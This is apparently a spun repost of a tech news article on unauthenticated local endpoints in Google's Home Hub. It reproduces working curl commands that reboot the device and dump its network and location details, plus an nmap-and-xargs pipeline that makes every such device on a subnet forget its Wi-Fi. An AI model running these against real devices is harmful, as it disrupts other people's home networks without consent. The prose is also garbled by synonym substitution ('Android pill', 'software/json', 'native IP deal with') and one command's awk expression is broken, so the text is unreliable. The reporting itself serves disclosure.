Home / Android / Google’s Home Hub can be bricked with one line of code

Google’s Home Hub can be bricked with one line of code

Security advocate Jerry Gamblin has posted a set of directions — primarily primary traces of XML — that may simply pull necessary data off the Google Home Hub and, in some instances, quickly brick the system.

The Home Hub, which is actually an Android pill connected to a speaker, is designed to behave as an in-room Google Assistant. This means it connects to Wi-Fi (and means that you can see open Wi-Fi entry factors close to the system), receives video and photographs from different units (and broadcasts its pin) and accepts instructions remotely (together with a fast reboot through the command line).

The command — which consists of a easy URL name through the command line — is clearly a part of the setup course of. You can do that at house in case you substitute “hub” with the Home Hub’s native IP deal with:

curl -Lv -H Content-Type:software/json --data-raw '"params":"now"' http://hub:8008/setup/reboot

https://platform.twitter.com/widgets.js

Other one-liners expose additional knowledge, together with a variety of micro providers:

$ curl -s http://hub:8008/setup/eureka_info | jq

"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": ,
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location":
"country_code": "US",
"latitude": 255,
"longitude": 255
,
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in":
"crash": true,
"opencast": true,
"stats": true
,
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats":
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
,
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10

Finally, this line causes all units in your community to neglect their Wi-Fi, forcing you to reenter the setup course of:

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ print up; gsub (/(' | xargs -I % curl -Lv -H Content-Type:software/json --data-raw ' "wpa_id": 0 ' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers, however they’re very alarming. Allowing unauthenticated entry to those providers is lazy at finest, and harmful at worst. He additionally notes that these endpoints have been open for years on numerous Google units, which suggests it is a common a part of the code base and never thought of an exploit by Google.

Again, nothing right here is mission vital — no Home Hub will ever save my life — however it will be good to know that units primarily based on the platform have some modicum of safety, even within the type of authentication or obfuscation. Today we are able to reboot Grandpa’s overcomplicated image body with a single line of code, however tomorrow we might be able to reboot Grandpa’s oxygen concentrator.



Source link

About Tech News Club

Leave a Reply

Your email address will not be published. Required fields are marked *